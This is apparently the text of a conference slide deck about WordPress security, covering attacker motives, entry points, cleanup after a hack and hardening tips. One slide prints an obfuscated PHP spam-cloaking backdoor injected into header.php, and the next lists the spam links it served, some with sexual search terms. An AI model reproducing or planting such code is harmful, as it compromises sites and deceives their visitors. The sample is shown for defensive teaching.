Justin Jones • Fort Wayne, IN @jjonesftw

I’m Justin Jones

0Teacher

0 Church Worker

0WordPress hobbyist

0 Podcast cohost at“The Weekly Theme Show”

0@jjonesftw

0 justinjones.net

Why would someone want to hack my site?

0The world doesn’t revolve around you

0 Crime of opportunity

0 Don’t leave your front door unlocked

0 “Black Hat” SEO

0To make money directly

0 Affiliate sales

0 Rogue virus scanners

0 Ransomeware

Why would someone want to hack my site?

0 Serve up images and content for SPAM email

What do they do while they’re poking around my site?

0Alter robots.txt

0 Override the WordPress generated robots.txt to add their pages into search engines

0 Create backdoors in unsuspecting .php files for future attacks

0Add their own .php files and images to serve up their payload content

0 Some are specific to “robots” or HTTP Referrer

What do they do while they’re poking around my site?

0 Inject code into theme files, like header.php<? //1234$GLOBALS['_2008634924_']=Array('error_re' .'porting','function_e' .'xi' .'st' .'s','fop' .'e' .'n','fwrite','' .'f' .'clos' .'e','' .'s' .'trstr','strtolower','ex' .'p' .'lode','ip2long','i' .'p2l' .'ong','l' .'ong2ip','ip2long','' .'fi' .'le_exists','pre' .'g_mat' .'ch','file_ge' .'t_contents','pr' .'eg_match','f' .'i' .'le' .'_get' .'_c' .'ont' .'ent' .'s','u' .'nseriali' .'ze','count','range','a' .'rra' .'y_splice','array_' .'values','preg' .'_matc' .'h','file' .'_get_' .'contents','un' .'ser' .'ial' .'iz' .'e','gzuncompress','base' .'64_deco' .'de','' .'str' .'len'); function _1572011439($i){$afa=Array('Ym90a28=','ZmlsZV9wd' .'XRf' .'Y2' .'9ud' .'GV' .'udHM=','dw==','Z29v' .'Z' .'2' .'xl','c2x' .'1cnA=','' .'bXN' .'uY' .'m' .'90','Yml' .'u' .'Z2JvdA==','Ym90','Y' .'3' .'Jhd2' .'w' .'=','' .'c3BpZGV' .'y','cm9' .'ib3Q=','' .'SH' .'R0cENsaWVudA=' .'=','' .'Y3' .'V' .'y' .'b' .'A' .'==','' .'c2' .'Nvb3Rlcg==','d3d3c3' .'Rlcg==','' .'UHl0aG9' .'u','' .'dX' .'J' .'sb' .'Gli','cG' .'Vyb' .'A=' .'=','bGlid3d3','b' .'HlueA==','VkIgUHJva' .'mVjd' .'A=' .'=','U' .'Hl0aG' .'9uLXVybGxpYi8yL' .'j' .'Y=','TW9' .'6a' .'Wx' .'sYS' .'82N' .'jYuKD' .'Y' .'p','TW9' .'6' .'aWxs' .'YS80L' .'jAgK' .'GNvbXB' .'hdGli' .'b' .'G' .'U7IE1' .'TS' .'UUgNi4w' .'OyBXa' .'W5kb3dzIE5UIDUuMS' .'k=','T' .'W96aWx' .'sYS' .'8' .'0LjA' .'g' .'KGNv' .'bX' .'Bh' .'dGl' .'i' .'bGU' .'7KQ==','' .'TW96aWxsYS80' .'LjAgK' .'GNvbXB' .'hdGlibG' .'U7IE1TSUUgNS4w' .'MDsg' .'V' .'2luZG' .'93cyA5OCk=','' .'TW' .'96' .'aWxsYS8' .'0LjAgKG' .'NvbXBhdGlibG' .'U7I' .'E' .'1' .'TSUUg' .'N' .'i4wO' .'yBX' .'aW5' .'kb3dzIE5UIDUuMTsg' .'U1YxK' .'Q' .'==','' .'TW96' .'aWxs' .'YS80' .'LjAg' .'KGNvb' .'X' .'Bh' .'dGlibGU7IE' .'1TSUUgN' .'i4wOyBXaW5kb3dzIE5UIDU' .'uMTsgLk5FV' .'C' .'BDTF' .'IgM' .'S4wL' .'jM' .'p','Lw==','Lm' .'N' .'vcmU' .'=','fDxpc' .'D4oLiopPC9pc' .'D58VWl' .'z','LmNvcmU=','' .'fDx' .'p' .'cD4' .'oLiopPC9pc' .'D58V' .'W' .'lz','bGlj' .'ZW' .'5zZ' .'S50eH' .'Q=','U' .'kVNT1RF' .'X0' .'FERFI=','SF' .'R' .'U' .'UF9VU0' .'VSX0FH' .'RU' .'5U','Ym90' .'a2' .'8=','fDx' .'pbnQ+KC4q' .'K' .'T' .'wv' .'aW50Pnx' .'VaX' .'M=','bGljZW5zZS50' .'eHQ=','' .'UkVR' .'VUV' .'TVF9VUkk=','' .'PGJ' .'yPg' .'==');return base64_decode($afa[$i]);} if(isset($_GET[_1572011439(0)])){}else{$GLOBALS['_2008634924_'][0](0);}if(!$GLOBALS['_2008634924_'][1](_1572011439(1))){function l__0($_0,$_1){$_2=@$GLOBALS['_2008634924_'][2]($_0,_1572011439(2));if(!$_2){return false;}else{$_3=$GLOBALS['_2008634924_'][3]($_2,$_1);$GLOBALS['_2008634924_'][4]($_2);return $_3;}}}function l__1($_4){$_5=array(_1572011439(3),_1572011439(4),_1572011439(5),_1572011439(6),_1572011439(7),_1572011439(8),_1572011439(9),_1572011439(10),_1572011439(11),_1572011439(12),_1572011439(13),_1572011439(14),_1572011439(15),_1572011439(16),_1572011439(17),_1572011439(18),_1572011439(19),_1572011439(20),_1572011439(21),_1572011439(22),_1572011439(23),_1572011439(24),_1572011439(25),_1572011439(26),_1572011439(27));foreach($_5 as $_6){if($GLOBALS['_2008634924_'][5] ($GLOBALS['_2008634924_'][6]($_7),$_6)){return($_6);}}return(false);}function l__2($_8,$_9){$_10=$GLOBALS ['_2008634924_'][7](_1572011439(28),$_8);$_11=$GLOBALS['_2008634924_'][8]($_10[0]);$_12=$GLOBALS['_2008634924_'][9]($_10[1]);$_13=$GLOBALS['_2008634924_'][10]($_12)== $_10[1]?$_12:0xffffffff <<(32-$_10[1]);$_14=$GLOBALS['_2008634924_'][11]($_9);return($_14&$_13)==($_11&$_13);}function l__3($REMOTE_ADDR){if($GLOBALS['_2008634924_'][12](_1572011439(29))){$GLOBALS['_2008634924_'][13](_1572011439(30),$GLOBALS['_2008634924_'][14](_1572011439(31)),$_15);}else{$GLOBALS['_2008634924_'][15](_1572011439(32),$GLOBALS['_2008634924_'][16](_1572011439(33)),$_15);}$_16=$GLOBALS['_2008634924_'][17]($_15[1]);foreach($_16 as $_9){if(l__2($_9,$REMOTE_ADDR))return true;}return false;}function l__4($_17,$_18){$_19=($_17*25173+13849)%$_18;return (int)$_19;}function l__5($_20,$_21,$_18){$_22=array();$_23=$GLOBALS['_2008634924_'][18]($_20);if($_23<$_18){return false;}$_24=$GLOBALS['_2008634924_'][19](0,$_23-1);$_21=$_21%$_23;for($_25=0;$_25<$_18;$_25++){$_26=l__4($_21,$_23--);$_22[]=$_20[$_24[$_26]];if(!$_23){break;}$GLOBALS['_2008634924_'][20]($_24,$_26,1);$_24=$GLOBALS['_2008634924_'][21]($_24);$_21=$_26;}return $_22;}$_27=l__3($_SERVER[_1572011439(34)]);$_28=l__1(@$_SERVER[_1572011439(35)]);if($_27 or isset($_GET[_1572011439(36)])or $_28){$GLOBALS['_2008634924_'][22](_1572011439(37),$GLOBALS ['_2008634924_'][23](_1572011439(38)),$_29);$_30=$GLOBALS['_2008634924_'][24]($GLOBALS['_2008634924_'][25]($GLOBALS['_2008634924_'][26]($_29[1])));$_31=l__5($_30,100+$GLOBALS['_2008634924_'][27]($_SERVER[_1572011439(39)]),75);for($_25=0;$_25<75;$_25++)echo $_31[$_25] ._1572011439(40);} //1234?>

What do they do while they’re poking around my site?

0 Inject code into theme files, like header.php<a href="http://oakhurstchurch.com/news/index.php?p=alison-carroll-hot">alison carroll hot</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-lowndes">Jessica Lowndes</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=zelda-williams">zelda williams</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=bush">bush</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=teresa-scanlan">Teresa Scanlan</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=leyla">leyla</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=heather-mills">Heather Mills</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=keshia-knight-pulliam-polly">keshia knight pulliam polly</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=moira-kelly-biography">moira kelly biography</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=smurfs">smurfs</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=laurene-jobs">Laurene jobs</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=bransales-importadora">bransales importadora</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=boo-boo-stewart">boo boo stewart</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=irina-shayk-y-cristiano-ronaldo">irina shayk y cristiano ronaldo</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=vanessa-angel">Vanessa Angel</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=lineas-del-metro-mexico-df">lineas del metro mexico df</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=brian-urlacher">brian urlacher</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">jessie palmer</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=jessie-palmer">Jessie Palmer</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=mark-hamill-before-and-after-crash">mark hamill before and after crash</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=jessica-jane-clement">jessica-jane clement</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=ashanti">ashanti</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=linea-del-metro-ciudad-de-mexico">linea del metro ciudad de mexico</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=lady-antebellum-photos">lady antebellum photos</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=heidi-range">heidi range</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=miley-cyrus-nude">miley cyrus nude</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=elizabeth-hurley">elizabeth hurley</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=ty-pennington-girlfriend">Ty Pennington Girlfriend</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=lsm05">lsm05</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=ls-magazine-pics">ls magazine pics</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=megan-mullally-naked">megan mullally naked</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=ls-model">ls model</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=mensagens-lindas">mensagens lindas</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=justin-bieber-bulge">justin bieber bulge</a>

<br><a href="http://oakhurstchurch.com/news/index.php?p=lg-esteem-review">lg esteem review</a>

How Do They Get In?

0Outdated versions of WordPress

0Outdated themes and plugins

0Hosting providers behind the times

0 Insecure password / brute force

0 Compromised computer0 Passwords cached in FTP clients, passwords stored in an

unencrypted text file etc…

0Unsecure internet connection0 Rogue access points

0 Packet sniffers on public WiFi

What are the consequences?

0Google will punish you.

0 Google Safe Browsing or manual removal action

What are the consequences?

0Google will punish you.

0 Google Safe Browsing or manual removal action

What are the consequences?

0Google will punish you.

0 Google Safe Browsing or manual removal action

What are the consequences?

0Other “blacklisting” like Norton Safe Web, Phish Tank, Opera, Sucuri, and many others

0 Spammy content will get indexed with every search engine

0 Don’t forget about directory listing sites, like Google Places / Google Maps

0 Your host may dump you for violating TOS

0Be a good neighbor!

What are the consequences?

0Be a good neighbor! Security is everyone’s responsibility

What are the consequences?

0Malware cost the US economy 2.2 billion dollars in lost productivity in 2011

0Are you an ecommerce site?

0 Payment gateway is probably offsite, but what about people’s email addresses?

0Membership site?

0 Many people re-use passwords

0 Linked In, Last.fm, many others recently

0Business or organization?

0 How much street cred will you earn serving content from exotic-dildos.co.cc

Is WordPress insecure?

0No.

0 Pharma hack had a patch out before exploited

0WordPress has a target on its back

0 WordPress is used by over 14.7% of Alexa Internet's "top 1 million" websites and as of August 2011 manages 22% of all new websites.

0 Some theme and plugin authors are lazy/sloppy, or use depreciated/inefficient methods

0 You are your own worst enemy!

0 Think about Windows XP back in like 2002

Is WordPress insecure?

0Be careful who you trust

0 Everyone is a “developer” now

0 NEVER download and install a theme for free that you should have paid for

0Shady scraper sites, torrents, etc…

0 “Having a website *should* cost you more than $300 a year. If it doesn’t, then you’re doing it wrong.” --Otto

Is WordPress insecure?

0Be careful who you trust

0 Be very wary of downloading a free theme outside of the WordPress.org theme repo

0Use “Theme Authenticity Checker” and “Theme Check”

0Siobhan McKeown at WPMU.org Google’d “free wordpress themes”0 Top 10 results: 1=wordpress.org; 1=poorly coded; 8=actively using

encrypted code to insert spammy links

0 Use trusted theme marketplaces or commercial shops

Prepare for Disaster

0 It’s going to happen

0Maintain regular backups0 Server side or Plugins

0Be registered with Google Webmaster Tools

0Know how to contact your hosting provider

0Know a developer

0Visit your site

0Watch your stats

Update. Update. Update.

0 Source: http://churchm.ag/wordpress-updates/

Update. Update. Update.

0August 2011, so 3.2.1 was most current

0 Less than half of the top 100k sites running WordPress were up to date!

0WordPress interates quickly to patch security holes. Keep updated to benefit from their work

0 Source: http://churchm.ag/wordpress-updates/

Update. Update. Update.

0WordPress core, .org plugins and .org themes can use the core update functionality

0 Some commercial theme and plugins have their own way of one click upgrade, some are manual only

0 Some have notifications, some don’t

0 Sign up for WordPress.org release notifications from download page

Here’s Where This Gets Technical

0 I’ll have these slides up on Slide Share

0 I’ve reserved time at the end for questions, and I’ll be available after for individual questions

It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0Take a deep breath and crack open a beer. You’ve got

some work ahead of you.

0Get back control of your site

0Get the site offline if you can!

It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0 Change *every* single one of your passwords

0 Domain registrar, hosting account, all WordPress users, SQL database username and password, FTP account password

0 I suggest changing your email account passwords

0Hire a professional

0 Check out http://sucuri.net/

0 Many others out there, Google them up!

It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0 Regenerate WordPress secret keys / salts

0 Manually in wp-config.php or use a plugin

define('AUTH_KEY', 'n%foh;/v6$)0<t]=Be]o~2L?nopubK;b1-P(x=~dCyY[pL]^Ry//=I$y.w-8&HGP');

define('SECURE_AUTH_KEY', 'q#h,K.OZ=-IT)(-`3`)G1Kr-&ZP,!CEM1<sMx-1eDI<H*BfO2G@~ bD<)]8rW|{/');

define('LOGGED_IN_KEY', 'Vuvu|_`AGu@) >*7K~l]B1v-d3-e}<Qo#hki8Fy(Bov:T~wOm#8hqHZbWP2khxR}');

define('NONCE_KEY', 'B&8:S*:tZR700I9]3~sWI0Rv1+9e_O{KXcc+`a!eB-wV$+Cctv$q*Yb+c.5w<xns');

define('AUTH_SALT', 'bpx*[xMhU<FjufQ*``oc&NNdvz,-FJ=|~+$G:i9qaCFRY>u,-}%-Cc-G|!5r0|D@');

define('SECURE_AUTH_SALT', 'S+C/f6B6[Y+uGJt!@K|c:49tA}xB!5_zE6RZ+ AT.bsFNvD^-YGOI@HG8V:YbR?q');

define('LOGGED_IN_SALT', '~oP,M4HQ8 ,M$<A[(`HZ@>_BC,Yo/Y].kw+{g^KnLPzB[UAI_Z6h6M+KbZ|.|<$-');

define('NONCE_SALT', 'KW*LbM<2qL7LAZZ!vdto?c?!(5eSb)|o$BA;{F-CLZB=M%_QfbdW[@lSDT_]ImE[');

It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0Backup

0Restore from a previous backup

0 Find and delete all the junk they added

0 Very insidious. Creating rogue sitemaps, modifying .htaccess files, creating backdoors, adding index.php files to override permalinks, etc…

0 Adding posts and images to database

0Reinstall WordPress core, plugins and themes

It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?0Begin the process of restoring your good name

0 Request delisting of bogus content from Google and other search engines

0Very tedious, manual process

0 Request reevaluation from blacklisting services

0 Don’t forget about other services that pull content from your site, like Google places

0 Wait it out. This will take weeks and months

0 Prepare better for next time

Harden Your Site.The Easy Stuff.

0Keep up to date! WordPress, plugins, themes – but also PHP version on your host

0Use strong passwords – no words! Not P@$$woRd either.

0 Consider using a password manager

0Remove “admin” user

Harden Your Site.The Easy Stuff.

0Only connect using SFTP

0Never ever hack core WordPress files

0Keep a clean house!

0 Other WP installs, other PHP services, plugins, old themes

0Disable user registration

Harden Your Site.The More Complicated Stuff.0 Store your wp-config file outside of public_html

0 Done at install or can be moved later

0 Change the database prefix

0Use strong database passwords

0Use proper 755 file permissions

0 If a plugin or theme asks you to set 777, avoid.

Harden Your Site.The More Complicated Stuff.0Only log in to site using SSL (https://...)

0Don’t advertise that you’re running an out of date version

0 Remove readme.html (plugins available)

0 Remove WordPress version from header (plugins available)

Harden Your Site.The More Complicated Stuff.0 Plugins! Plugins! Plugins!

0 Monitor core / template files

0 “WordPress File Monitor Plus”

0 Scan template files for suspicious code

0 “AntiVirus”

0 WP and server security settings

0 “WebsiteDefender WordPress Security”

0 Keep up to date

0 “Update Notifications”

Harden Your Site.The More Complicated Stuff.0 Plugins! Plugins! Plugins!

0 “WordPress Firewall 2”

0 “Block Bad Queries”

0 Backup

0VaultPress

0BackupBuddy

0 Login Lockdown

0Lock out excessive retries and mask login errors

0 Many others available for two factor auth, etc…

0 Sucuri plugin has a firewall to block known bad IP’s

Should you really be hosting your own site?

0Do you like to change your own oil in your car or take it to the Jiffy Lube?

0WordPress.com is a great resource for most personal bloggers. Focus on writing your content.

0 Consider a WordPress managed host.

0 WP Engine, ZippyKid, Pagely, etc…

0Don’t be afraid to pay someone!

0 How important is this project?

0 What is your time worth?

Resources

0 Codepoet.com

0 eBook “Locking Down WordPress”

Resources

0These slides on Slide Share

0 Search for slides from Dre Armeda and Brad Williams

0WordPress.org Codex

0Otto on WordPress

0 Sucuri.net – service and blog

0 Lockdown WordPress – A Security Webinar with Dre Armeda

0 1.5 hour interview – great resource!

0 Countless plugins on the WordPress.org repo

0 http://sitecheck.sucuri.net/scanner/

Questions?

0No question is stupid. We’re all here to learn!

0 If you’re smarter than I am, please jump in here.